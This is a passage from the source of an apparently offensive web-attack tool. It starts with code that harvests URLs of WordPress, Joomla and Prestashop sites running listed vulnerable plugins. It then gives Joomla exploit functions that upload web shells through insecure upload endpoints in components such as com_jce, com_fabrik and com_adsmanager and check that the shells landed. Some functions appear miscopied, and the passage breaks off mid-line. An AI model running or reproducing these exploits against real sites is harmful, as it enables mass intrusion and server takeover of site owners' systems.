175 | print (' %s URL : %s ' %(good , webs[i]))
176 | print (' %s DOMAIN: %s ' %(good , domains))
177 | export.write(domains)
178 | export.write('\n')
179 | elif exploitname in wpindex:
180 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php/wp-json/wp/'),response)
181 | if len(dorks) > 0:
182 | for web in dorks:
183 | if web not in webs:
184 | webs.append(web)
185 | for i in range(len(webs)):
186 | domains = parsify(webs[i])
187 | print (' %s URL : %s ' %(good , webs[i]))
188 | print (' %s DOMAIN: %s ' %(good , domains))
189 | export.write(domains)
190 | export.write('\n')
191 | elif exploitname in joomla:
192 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php?option=com_jce'),response)
193 | if len(dorks) > 0:
194 | for web in dorks:
195 | if web not in webs:
196 | webs.append(web)
197 | for i in range(len(webs)):
198 | domains = parsify(webs[i])
199 | print (' %s URL : %s ' %(good , webs[i]))
200 | print (' %s DOMAIN: %s ' %(good , domains))
201 | export.write(domains)
202 | export.write('\n')
203 | elif exploitname in prestashop:
204 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/modules/\w+'),response)
205 | if len(dorks) > 0:
206 | for web in dorks:
207 | if web not in webs:
208 | webs.append(web)
209 | for i in range(len(webs)):
210 | domains = parsify(webs[i])
211 | print (' %s URL : %s ' %(good , webs[i]))
212 | print (' %s DOMAIN: %s ' %(good , domains))
213 | export.write(domains)
214 | export.write('\n')
215 |
216 | class DorkList():
217 |
218 | @staticmethod
219 | def dorkslist():
220 | print("""
221 | %sWordPress Joomla Prestashop
222 | --------- ------ -----------%s
223 | blaze comjce columnadverts
224 | catpro comfabrik soopabanners
225 | cherry comjdownloads vtslide
226 | dm comfoxcontact simpleslideshow
227 | fromcraft productpageadverts
228 | synoptic productpageadvertsb
229 | shop jro_homepageadvertise
230 | revslider attributewizardpro
231 | adsmanager oneattributewizardpro
232 | inboundiomarketing attributewizardpro_old
233 | wysija attributewizardpro_x
234 | powerzoomer advancedslider
235 | showbiz cartabandonmentpro
236 | jobmanager cartabandonmentpro_old
237 | injection videostab
238 | thumbslider wg24themeadministration
239 | fieldvmegamenu
240 | wdoptionpanel
241 | pk_flexmenu
242 | pk_vertflexmenu
243 | nvn_export_orders
244 | tdpsthemeoptionpanel
245 | masseditproduct
246 | """%(W,end))
247 |
248 |
249 |
250 | @staticmethod
251 | def wp_dorkTable():
252 | print("""
253 | WordPress
254 | ---------
255 | blaze
256 | catpro
257 | cherry
258 | dm
259 | fromcraft
260 | synoptic
261 | shop
262 | revslider
263 | adsmanager
264 | inboundiomarketing
265 | wysija
266 | powerzoomer
267 | showbiz
268 | jobmanager
269 | injection
270 | thumbslider
271 | """)
272 |
273 | @staticmethod
274 | def joo_dorkTable():
275 | print("""
276 | Joomla
277 | ------
278 | comjce
279 | comfabrik
280 | comjdownloads
281 | comfoxcontact
282 | """)
283 |
284 | @staticmethod
285 | def ps_dorkTable():
286 |
287 | print("""
288 | Prestashop
289 | -----------
290 | columnadverts
291 | soopabanners
292 | vtslide
293 | simpleslideshow
294 | productpageadverts
295 | productpageadvertsb
296 | jro_homepageadvertise
297 | attributewizardpro
298 | oneattributewizardpro
299 | attributewizardpro_old
300 | attributewizardpro_x
301 | advancedslider
302 | cartabandonmentpro
303 | cartabandonmentpro_old
304 | videostab
305 | wg24themeadministration
306 | fieldvmegamenu
307 | wdoptionpanel
308 | pk_flexmenu
309 | pk_vertflexmenu
310 | nvn_export_orders
311 | tdpsthemeoptionpanel
312 | masseditproduct
313 | """)
314 |
315 | @staticmethod
316 | def loko_dorkTable():
317 | print("""
318 | Lokomedia
319 | ------
320 | """)
321 |
322 | @staticmethod
323 | def dru_dorkTable():
324 | print("""
325 | Drupal
326 | ------
327 | """)
--------------------------------------------------------------------------------
/modules/druExploits.py:
--------------------------------------------------------------------------------
1 | import re
2 | import random
3 | import datetime
4 | import requests
5 | from common.uriParser import parsing_url as hostd
6 | now = datetime.datetime.now()
7 | year = now.strftime('%Y')
8 | month= now.strftime('%m')
9 |
10 | import os
11 | Session = requests.Session()
12 |
13 | from common.colors import failexploit , vulnexploit , que , info , good
14 | from common.requestUp import sendrequest as vxpost
15 | from common.requestUp import getrequest as vxget
16 |
--------------------------------------------------------------------------------
/modules/jooExploits.py:
--------------------------------------------------------------------------------
1 | import re
2 | import random
3 | import datetime
4 | import requests
5 | now = datetime.datetime.now()
6 | year = now.strftime('%Y')
7 | month= now.strftime('%m')
8 |
9 | import os
10 | Session = requests.Session()
11 |
12 | from common.colors import failexploit , vulnexploit , que , info , good
13 |
14 | def com_jce(url,headers):
15 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
16 | endpoint = url+"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
17 | data = {
18 | 'upload-dir':'./../../',
19 | 'upload-overwrite':0,
20 | 'Filedata' : [open('shell/VulnX.gif','rb')],
21 | 'action':'Upload',
22 | }
23 | content = Session.post(endpoint,data,headers)
24 | path_shell = url + "/VulnX.gif"
25 | res=requests.get(path_shell, headers).text
26 | matches = re.findall(re.compile(r'/image/gif/'),res)
27 | if matches:
28 | print (' %s com_jce %s %s' %(que,vulnexploit,path_shell))
29 | else:
30 | print (' %s com_jce %s' %(que , failexploit))
31 |
32 | def com_media(url,headers):
33 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
34 | endpoint = url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
35 | headers={"content-type":["form-data"]}
36 | fieldname = 'Filedata[]'
37 | shell = open('shell/VulnX.txt','rb')
38 | data = {
39 | fieldname:shell,
40 | }
41 | content = Session.post(endpoint,data,headers)
42 | path_shell = endpoint+"/images/XAttacker.txt"
43 | response = requests.get(path_shell,headers).text
44 | if re.findall(r'Tig', response):
45 | print (' %s com_media %s %s' %(que,vulnexploit,path_shell))
46 | else:
47 | print (' %s com_media %s' %(que , failexploit))
48 |
49 |
50 | #def com_jdownloads(url,headers):
51 | # endpoint = url+"index.php?option=com_jdownloads&Itemid=0&view=upload"
52 | # files = open('shell/VulnX.zip','rb')
53 | # shell = open('shell/VulnX.gif','rb')
54 | # data = {
55 | # 'name' : 'Tig',
56 | # 'mail' :'tig@tig.com',
57 | # 'filetitle' :'Tig',
58 | # 'catlist':'1',
59 | # 'license':'0',
60 | # 'language':'0',
61 | # 'system':'0',
62 | # 'file_upload': files,
63 | # 'pic_upload':shell,
64 | # 'description':'zot
',
65 | # 'senden':'Send file',
66 | # 'option':'com_jdownloads',
67 | # 'view':'upload',
68 | # 'send':'1',
69 | # '24c22896d6fe6977b731543b3e44c22f':'1',
70 | # }
71 | # upload_file = Session.post(endpoint,data)
72 | # path_shell = endpoint+"/images/jdownloads/screenshots/VulnX.gif?Vuln=X"
73 | # response = requests.get(path_shell).text
74 | # if re.findall(r'Vuln X', response):
75 | # print (' %s com_jdownloads %s %s' %(que,vulnexploit,path_shell))
76 | # else:
77 | # print (' %s com_jdownloads %s' %(que , failexploit))
78 |
79 | #def com_jdownloadsb(url,headers):
80 | # headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
81 | # endpoint = url+"/images/jdownloads/screenshots/VulnX.php"
82 | # headers={"content-type":["form-data"]}
83 | # files = open('shell/VulnX.zip','rb')
84 | # shell = open('shell/VulnX.gif','rb')
85 | # data = {
86 | # 'name' : 'Tig',
87 | # 'mail' :'tig@tig.com',
88 | # 'filetitle' :'Tig',
89 | # 'catlist':'1',
90 | # 'license':'0',
91 | # 'language':'0',
92 | # 'system':'0',
93 | # 'file_upload': files,
94 | # 'pic_upload':shell,
95 | # 'description':'zot
',
96 | # 'senden':'Send file',
97 | # 'option':'com_jdownloads',
98 | # 'view':'upload',
99 | # 'send':'1',
100 | # '24c22896d6fe6977b731543b3e44c22f':'1'
101 | # }
102 | # response = requests.get(endpoint,headers).text
103 | # if re.findall(r'200', response):
104 | # print (' %s com_jdownloads2 %s %s' %(que,vulnexploit,endpoint))
105 | # else:
106 | # print (' %s com_jdownloads2 %s' %(que , failexploit))
107 |
108 | def com_fabrika(url,headers):
109 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
110 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
111 |
112 | headers={"content-type":["form-data"]}
113 | fieldname = 'file'
114 | shell = open('shell/VulnX.php','rb')
115 | data = {
116 | fieldname:shell,
117 | }
118 | content = Session.post(endpoint,data,headers)
119 | path_shell = endpoint+"/images/XAttacker.txt"
120 | response = requests.get(path_shell,headers).text
121 | if re.findall(r'Vuln X', response):
122 | print (' %s com_fabrik1 %s %s' %(que,vulnexploit,path_shell))
123 | else:
124 | print (' %s com_fabrik1 %s' %(que , failexploit))
125 |
126 | def com_fabrikb(url,headers):
127 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
128 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
129 |
130 | headers={"content-type":["form-data"]}
131 | fieldname = 'file'
132 | shell = open('shell/VulnX.txt','rb')
133 | data = {
134 | fieldname:shell,
135 | }
136 | content = Session.post(endpoint,data,headers)
137 | path_shell = endpoint+"/images/XAttacker.txt"
138 | response = requests.get(path_shell,headers).text
139 | if re.findall(r'Tig', response):
140 | print (' %s com_fabrik2 %s %s' %(que,vulnexploit,path_shell))
141 | else:
142 | print (' %s com_fabrik2 %s' %(que , failexploit))
143 |
144 | def com_foxcontact(url,headers):
145 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
146 | # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
147 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
148 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
149 | # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
150 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
151 |
152 | headers={"content-type":["form-data"]}
153 | fieldname = 'file'
154 | shell = open('shell/VulnX.txt','rb')
155 | data = {
156 | fieldname:shell,
157 | }
158 | content = Session.post(endpoint,data,headers)
159 | path_shell = endpoint+"/images/XAttacker.txt"
160 | response = requests.get(path_shell,headers).text
161 | if re.findall(r'Tig', response):
162 | print (' %s com_foxcontact %s %s' %(que,vulnexploit,path_shell))
163 | else:
164 | print (' %s com_foxcontact %s' %(que , failexploit))
165 |
166 | def com_adsmanager(url,headers):
167 | endpoint = url + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
168 | img = open('shell/VulnX.php', 'rb')
169 | name_img= os.path.basename('shell/VulnX.html')
170 | files= {'image': (name_img,img,'form-data',{'Expires': '0'}) }
171 | upload_file = Session.post(endpoint,files=files)
172 | shellup = url + "/tmp/plupload/VulnX.html"
173 | checkShell = requests.get(shellup).text
174 | statusCheck = re.findall(re.compile(r'VulnX'),checkShell)
175 | if statusCheck:
176 | print(' %s com_adsmanager %s %s' %(que,vulnexploit,shellup))
177 | else:
178 | print(' %s com_adsmanager %s' %(que , failexploit))
179 |
180 | def com_blog(url,headers):
181 | endpoint = url + "/index.php?option=com_myblog&task=ajaxupload"
182 | checkShell = requests.get(endpoint).text
183 | statusCheck = re.findall(re.compile(r'has been uploaded'),endpoint)
184 | if statusCheck:
185 | print(' %s com_blog %s %s' %(que,vulnexploit,endpoint))
186 | else:
187 | print(' %s com_blog %s' %(que , failexploit))
188 |
189 | def com_users(url,headers):
190 | endpoint = url + "/index.php?option=com_users&view=registration"
191 | checkShell = requests.get(endpoint).text
192 | statusCheck = re.findall(re.compile(r'jform_email2-lbl'),endpoint)
193 | if statusCheck:
194 | print(' %s com_users %s %s' %(que,vulnexploit,endpoint))
195 | else:
196 | print(' %s com_users %s' %(que , failexploit))
197 |
198 | def comweblinks(url,headers):
199 | endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author="
200 | token = re.findall(re.compile(r'